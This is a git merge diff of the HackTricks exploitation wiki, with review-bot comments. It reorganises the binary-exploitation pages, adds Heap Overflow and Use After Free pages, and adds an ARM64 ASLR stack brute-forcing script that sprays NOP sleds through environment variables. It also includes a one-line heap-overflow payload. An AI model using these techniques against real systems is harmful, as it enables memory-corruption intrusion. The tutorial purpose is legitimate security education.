Merge branch 'HackTricks-wiki:master' into master
Binary files added (new files):
- .gitbook/assets/image (1202).png (599 KiB)
- .gitbook/assets/image (1203).png (248 KiB)
- .gitbook/assets/image (1204).png (220 KiB)
- .gitbook/assets/image (1205).png (131 KiB)
- .gitbook/assets/image (1206).png (124 KiB)
- .gitbook/assets/image (1207).png (29 KiB)
- .gitbook/assets/image (1208).png (94 KiB)
- .gitbook/assets/image (1209).png (96 KiB)
- .gitbook/assets/image (1210).png (238 KiB)
- .gitbook/assets/image (1211).png (218 KiB)
- .gitbook/assets/image (1212).png (188 KiB)
- .gitbook/assets/image (1213).png (36 KiB)
- .gitbook/assets/image (1214).png (213 KiB)
- .gitbook/assets/image (1215).png (244 KiB)
- .gitbook/assets/image (1216).png (209 KiB)
- .gitbook/assets/image (1217).png (562 KiB)
- .gitbook/assets/image (1218).png (297 KiB)
- .gitbook/assets/image (1219).png (230 KiB)
- .gitbook/assets/image (1220).png (45 KiB)
- .gitbook/assets/image (1221).png (247 KiB)
- .gitbook/assets/image (1222).png (394 KiB)
- .gitbook/assets/image (1223).png (258 KiB)
.github/pull_request_template.md (2 changes, vendored)
|
@ -1,7 +1,7 @@
|
||||||
You can remove this content before sending the PR:
|
You can remove this content before sending the PR:
|
||||||
|
|
||||||
## Attribution
|
## Attribution
|
||||||
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or have explicit permission to use from the original author. Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
|
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
|
||||||
|
|
||||||
|
|
||||||
Thank you for contributing to HackTricks!
|
Thank you for contributing to HackTricks!
|
||||||
|
|
|
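Review bot: the rewritten attribution sentence is ungrammatical: "content that you own or that have permission to share it from the original author (adding a reference ...)". Suggest: "content that you own or that you have the original author's permission to share, adding a reference to the author in the added text, at the end of the page you are modifying, or both."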
@ -112,7 +112,7 @@ You can **create a free account** [**here**](https://serpapi.com/users/sign\_up)
|
||||||
|
|
||||||
### [WebSec](https://websec.nl/)
|
### [WebSec](https://websec.nl/)
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
|
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
|
||||||
|
|
||||||
|
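Review bot: the replacement `<figure>` keeps `alt=""` and an empty `<figcaption>`, so the sponsor image conveys nothing in text-only renderers and screen readers; set `alt="WebSec"` on the new `websec (1).svg` figure (the old gif had the same problem, so this is a chance to fix it rather than carry it over).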
@ -122,7 +122,7 @@ Another cool thing about WebSec is that unlike the industry average WebSec is **
|
||||||
|
|
||||||
In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||||
|
|
||||||
## License & Disclaimer
|
## License & Disclaimer
|
||||||
|
|
||||||
|
|
SUMMARY.md (18 changes)
|
@ -526,7 +526,8 @@
|
||||||
* [BrowExt - XSS Example](pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md)
|
* [BrowExt - XSS Example](pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md)
|
||||||
* [Bypass Payment Process](pentesting-web/bypass-payment-process.md)
|
* [Bypass Payment Process](pentesting-web/bypass-payment-process.md)
|
||||||
* [Captcha Bypass](pentesting-web/captcha-bypass.md)
|
* [Captcha Bypass](pentesting-web/captcha-bypass.md)
|
||||||
* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception.md)
|
* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception/README.md)
|
||||||
|
* [Cache Poisoning to DoS](pentesting-web/cache-deception/cache-poisoning-to-dos.md)
|
||||||
* [Clickjacking](pentesting-web/clickjacking.md)
|
* [Clickjacking](pentesting-web/clickjacking.md)
|
||||||
* [Client Side Template Injection (CSTI)](pentesting-web/client-side-template-injection-csti.md)
|
* [Client Side Template Injection (CSTI)](pentesting-web/client-side-template-injection-csti.md)
|
||||||
* [Client Side Path Traversal](pentesting-web/client-side-path-traversal.md)
|
* [Client Side Path Traversal](pentesting-web/client-side-path-traversal.md)
|
||||||
|
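Review bot: `Cache Poisoning and Cache Deception` moves from `pentesting-web/cache-deception.md` to `pentesting-web/cache-deception/README.md`; any other page that links to the old `.md` path will break, so grep the repo for `cache-deception.md` and update those references, since this hunk only updates the SUMMARY entry.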
@ -689,10 +690,12 @@
|
||||||
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
|
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
|
||||||
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
|
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
|
||||||
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
|
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
|
||||||
* [Stack Shellcode](binary-exploitation/stack-overflow/stack-shellcode.md)
|
|
||||||
* [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
|
||||||
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
|
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
|
||||||
* [Ret2win](binary-exploitation/stack-overflow/ret2win.md)
|
* [Ret2win](binary-exploitation/stack-overflow/ret2win/README.md)
|
||||||
|
* [Ret2win - arm64](binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md)
|
||||||
|
* [Stack Shellcode](binary-exploitation/stack-overflow/stack-shellcode/README.md)
|
||||||
|
* [Stack Shellcode - arm64](binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md)
|
||||||
|
* [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
||||||
* [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
* [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
||||||
* [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
|
* [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||||
* [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
* [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
||||||
|
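Review bot: besides turning `Ret2win` and `Stack Shellcode` into folders with arm64 sub-pages, this hunk moves `Stack Shellcode` and `Stack Pivoting - EBP2Ret - EBP chaining` from before `Pointer Redirecting` to after `Ret2win`, which changes the sidebar order; if only the nesting was intended, keep them where they were. Also, indentation is not preserved in this rendered view, so double-check that `Ret2win - arm64` and `Stack Shellcode - arm64` are indented under their parents, otherwise GitBook lists them as top-level siblings.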
@ -702,13 +705,18 @@
|
||||||
* [Leaking libc address with ROP](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md)
|
* [Leaking libc address with ROP](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md)
|
||||||
* [Leaking libc - template](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md)
|
* [Leaking libc - template](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md)
|
||||||
* [One Gadget](binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md)
|
* [One Gadget](binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md)
|
||||||
* [Ret2syscall](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv.md)
|
* [Ret2lib + Printf leak - arm64](binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md)
|
||||||
|
* [Ret2syscall](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md)
|
||||||
|
* [Ret2syscall - ARM64](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md)
|
||||||
* [Ret2vDSO](binary-exploitation/rop-return-oriented-programing/ret2vdso.md)
|
* [Ret2vDSO](binary-exploitation/rop-return-oriented-programing/ret2vdso.md)
|
||||||
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming.md)
|
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming.md)
|
||||||
* [Array Indexing](binary-exploitation/array-indexing.md)
|
* [Array Indexing](binary-exploitation/array-indexing.md)
|
||||||
* [Integer Overflow](binary-exploitation/integer-overflow.md)
|
* [Integer Overflow](binary-exploitation/integer-overflow.md)
|
||||||
* [Format Strings](binary-exploitation/format-strings/README.md)
|
* [Format Strings](binary-exploitation/format-strings/README.md)
|
||||||
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
|
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
|
||||||
|
* [Heap](binary-exploitation/heap/README.md)
|
||||||
|
* [Use After Free](binary-exploitation/heap/use-after-free.md)
|
||||||
|
* [Heap Overflow](binary-exploitation/heap/heap-overflow.md)
|
||||||
* [Common Binary Exploitation Protections & Bypasses](binary-exploitation/common-binary-protections-and-bypasses/README.md)
|
* [Common Binary Exploitation Protections & Bypasses](binary-exploitation/common-binary-protections-and-bypasses/README.md)
|
||||||
* [ASLR](binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md)
|
* [ASLR](binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md)
|
||||||
* [Ret2plt](binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md)
|
* [Ret2plt](binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md)
|
||||||
|
|
|
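Review bot: the new file name `ret2lib-+-printf-leak-arm64.md` embeds a literal `+`, which breaks the kebab-case convention of the sibling entries (`ret2syscall-arm64.md`, `rop-leaking-libc-template.md`) and is form-decoded to a space by some URL handlers and link checkers; rename it to `ret2lib-printf-leak-arm64.md` before the link gets copied into other pages.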
@ -89,7 +89,7 @@ Something to take into account is that usually **just one exploitation of a vuln
|
||||||
|
|
||||||
#### Via syscalls
|
#### Via syscalls
|
||||||
|
|
||||||
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv.md): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**.
|
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**.
|
||||||
* If [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries.
|
* If [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries.
|
||||||
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming.md) can be useful to prepare the **ret2execve**
|
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming.md) can be useful to prepare the **ret2execve**
|
||||||
* Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers
|
* Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers
|
||||||
|
|
|
@ -98,9 +98,80 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
|
||||||
* If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
|
* If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
In 64bit systems the entropy is much higher and this isn't possible.
|
In 64bit systems the entropy is much higher and this shouldn't possible.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
|
### 64 bits stack brute-forcing
|
||||||
|
|
||||||
|
It's possible to occupy a big part of the stack with env variables and then try to abuse the binary hundreds/thousands of times locally to exploit it.\
|
||||||
|
The following code shows how it's possible to **just select an address in the stack** and every **few hundreds of executions** that address will contain the **NOP instruction**:
|
||||||
|
|
||||||
|
```c
|
||||||
|
//clang -o aslr-testing aslr-testing.c -fno-stack-protector -Wno-format-security -no-pie
|
||||||
|
#include <stdio.h>
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
unsigned long long address = 0xffffff1e7e38;
|
||||||
|
unsigned int* ptr = (unsigned int*)address;
|
||||||
|
unsigned int value = *ptr;
|
||||||
|
printf("The 4 bytes from address 0xffffff1e7e38: 0x%x\n", value);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
```python
|
||||||
|
import subprocess
|
||||||
|
import traceback
|
||||||
|
|
||||||
|
# Start the process
|
||||||
|
nop = b"\xD5\x1F\x20\x03" # ARM64 NOP transposed
|
||||||
|
n_nops = int(128000/4)
|
||||||
|
shellcode_env_var = nop * n_nops
|
||||||
|
|
||||||
|
# Define the environment variables you want to set
|
||||||
|
env_vars = {
|
||||||
|
'a': shellcode_env_var,
|
||||||
|
'b': shellcode_env_var,
|
||||||
|
'c': shellcode_env_var,
|
||||||
|
'd': shellcode_env_var,
|
||||||
|
'e': shellcode_env_var,
|
||||||
|
'f': shellcode_env_var,
|
||||||
|
'g': shellcode_env_var,
|
||||||
|
'h': shellcode_env_var,
|
||||||
|
'i': shellcode_env_var,
|
||||||
|
'j': shellcode_env_var,
|
||||||
|
'k': shellcode_env_var,
|
||||||
|
'l': shellcode_env_var,
|
||||||
|
'm': shellcode_env_var,
|
||||||
|
'n': shellcode_env_var,
|
||||||
|
'o': shellcode_env_var,
|
||||||
|
'p': shellcode_env_var,
|
||||||
|
}
|
||||||
|
|
||||||
|
cont = 0
|
||||||
|
while True:
|
||||||
|
cont += 1
|
||||||
|
|
||||||
|
if cont % 10000 == 0:
|
||||||
|
break
|
||||||
|
|
||||||
|
print(cont, end="\r")
|
||||||
|
# Define the path to your binary
|
||||||
|
binary_path = './aslr-testing'
|
||||||
|
|
||||||
|
try:
|
||||||
|
process = subprocess.Popen(binary_path, env=env_vars, stdout=subprocess.PIPE, text=True)
|
||||||
|
output = process.communicate()[0]
|
||||||
|
if "0xd5" in str(output):
|
||||||
|
print(str(cont) + " -> " + output)
|
||||||
|
except Exception as e:
|
||||||
|
print(e)
|
||||||
|
print(traceback.format_exc())
|
||||||
|
pass
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1211).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### Local Information (`/proc/[pid]/stat`)
|
### Local Information (`/proc/[pid]/stat`)
|
||||||
|
|
||||||
The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as:
|
The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as:
|
||||||
|
|
|
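Review bot: the comment `# ARM64 NOP transposed` on the `nop` line should spell out the byte order, because as written the sled is only valid at one alignment: the ARM64 NOP is 0xD503201F, stored little-endian as `1F 20 03 D5`, and a buffer of repeated `D5 1F 20 03` reads as `1F 20 03 D5` only from an address one byte into the pattern. That is also the only alignment the check `if "0xd5" in str(output)` matches (the 4-byte read prints as `0xd503201f`; at the other three offsets it prints `0x3201fd5`, `0x1fd50320` or `0x201fd503`), so this deserves a comment explaining that the hit means the read landed on a correctly aligned NOP. Two smaller points: the edited hint now reads "this shouldn't possible" (missing "be"), and the 128000 bytes per variable sit just under the 128 KiB per-string limit Linux enforces on environment strings (with 4 KiB pages), which is worth a comment since readers will try larger values and get `E2BIG`.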
@ -22,7 +22,7 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
|
||||||
|
|
||||||
* It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/) **to bypass** this protection by executing chunks of executable code already present in the binary.
|
* It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/) **to bypass** this protection by executing chunks of executable code already present in the binary.
|
||||||
* [**Ret2libc**](../rop-return-oriented-programing/ret2lib/)
|
* [**Ret2libc**](../rop-return-oriented-programing/ret2lib/)
|
||||||
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv.md)
|
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/)
|
||||||
* **Ret2...**
|
* **Ret2...**
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
binary-exploitation/heap/README.md (new file, 2 lines)
|
@ -0,0 +1,2 @@
|
||||||
|
# Heap
|
||||||
|
|
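Review bot: `binary-exploitation/heap/README.md` is added with only the `# Heap` heading, yet SUMMARY.md now lists it as the parent of `Use After Free` and `Heap Overflow`; a landing page with no body renders as an empty section. Add at least a sentence on what this section covers and `content-ref` links to the two child pages.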
binary-exploitation/heap/heap-overflow.md (new file, 47 lines)
|
@ -0,0 +1,47 @@
|
||||||
|
# Heap Overflow
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Basic Information
|
||||||
|
|
||||||
|
A heap overflow is like a [**stack overflow**](../stack-overflow/) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.**
|
||||||
|
|
||||||
|
In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this.
|
||||||
|
|
||||||
|
{% hint style="success" %}
|
||||||
|
In order to find overflow offsets you can use the same patters as in [**stack overflows**](../stack-overflow/#finding-stack-overflows-offsets).
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
## Example ARM64
|
||||||
|
|
||||||
|
In the page [https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/](https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/) you can find a heap overflow example where a command that is going to be executed is stored in the following chunk from the overflowed chunk. So, it's possible to modify the executed command by overwriting it with an easy exploit such as:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
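Review bot: "patters" should be "patterns" in the hint, and "stored data was bigger than the space reserved" reads better as "the data written was larger than the space reserved". The example command would also be clearer with a sentence saying what the 0x400 bytes of padding correspond to in the linked post, and noting that `print()` appends a newline after the `\x00`, so readers checking the file size understand the extra byte.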
binary-exploitation/heap/use-after-free.md (new file, 40 lines)
|
@ -0,0 +1,40 @@
|
||||||
|
# Use After Free
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Basic Information
|
||||||
|
|
||||||
|
As the name implies, this vulnerability occurs when a program **stores some space** in the heap for an object, **writes** some info there, **frees** it apparently because it's not needed anymore and then **accesses it again**.
|
||||||
|
|
||||||
|
The problem here is that it's not ilegal (there **won't be errors**) when a **freed memory is accessed**. So, if the program (or the attacker) managed to **allocate the freed memory and store arbitrary data**, when the freed memory is accessed from the initial pointer that **data would be have been overwritten** causing a **vulnerability that will depends on the sensitivity of the data** that was stored original (if it was a pointer of a function that was going to be be called, an attacker could know control it).
|
||||||
|
|
||||||
|
## Other References & Examples
|
||||||
|
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-2-use-after-free/](https://8ksec.io/arm64-reversing-and-exploitation-part-2-use-after-free/)
|
||||||
|
* ARM64. Use after free: Generate a user, free it, reuse the same chunk **overwriting the position of user->password** from the previous one. Reuse the user to **bypass the password check**
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
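Review bot: the second paragraph of Basic Information needs a grammar pass: "ilegal" -> "illegal", "data would be have been overwritten" -> "data will have been overwritten", "a vulnerability that will depends on" -> "that depends on", "stored original" -> "stored originally", "going to be be called" -> "going to be called", and "an attacker could know control it" presumably means "could now control it". It would also help to state the precondition plainly: the dangling pointer only matters if the program reads through it after the chunk has been handed out again, which is exactly what the ARM64 reference below relies on (free the user, reallocate the same chunk, reuse the old pointer).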
@ -112,18 +112,19 @@ In this example, if a user inputs a negative number, it will be interpreted as a
|
||||||
### Other Examples
|
### Other Examples
|
||||||
|
|
||||||
* [https://guyinatuxedo.github.io/35-integer\_exploitation/int\_overflow\_post/index.html](https://guyinatuxedo.github.io/35-integer\_exploitation/int\_overflow\_post/index.html)
|
* [https://guyinatuxedo.github.io/35-integer\_exploitation/int\_overflow\_post/index.html](https://guyinatuxedo.github.io/35-integer\_exploitation/int\_overflow\_post/index.html)
|
||||||
* The program is only validating the lastbyte of a number to check for the size of the input, therefore it's possible to add any zie as long as the last byte is inside the allowed range. Then, the input creates a buffer overflow exploited with a ret2win.
|
* Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection
|
||||||
* [https://guyinatuxedo.github.io/35-integer\_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer\_exploitation/puzzle/index.html)
|
* [https://guyinatuxedo.github.io/35-integer\_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer\_exploitation/puzzle/index.html)
|
||||||
* Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one: 
|
* Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one: 
|
||||||
|
|
||||||
```
|
```
|
||||||
(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569)
|
(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569)
|
||||||
```
|
```
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/)
|
||||||
|
* Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection and overwrite in the stack the next local variable and bypass both protections
|
||||||
|
|
||||||
\
|
## ARM64
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/).
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
|
|
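Review bot: the description under the first guyinatuxedo link (int_overflow_post) is wrong after this change: the original bullet about validating only the last byte of the size was replaced with "Only 1B is used to store the size of the password ...", which is the same sentence added under the 8ksec part-8 link below, so the first link now carries the second link's summary. Restore the original bullet (fixing "zie" to "size") and keep the 1B-password text only under the 8ksec entry. Also, the stray `\` line just before `## ARM64` renders as a hard line break and can be dropped.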
@ -159,6 +159,18 @@ In this example:
|
||||||
Since **x64 uses registers for the first few arguments,** it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. The increased number of registers and the larger address space in **x64** architecture provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP).
|
Since **x64 uses registers for the first few arguments,** it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. The increased number of registers and the larger address space in **x64** architecture provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP).
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
|
## ROP chain in ARM64 Example
|
||||||
|
|
||||||
|
### **ARM64 Basics & Calling conventions**
|
||||||
|
|
||||||
|
Check the following page for this information:
|
||||||
|
|
||||||
|
{% content-ref url="../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Protections Against ROP
|
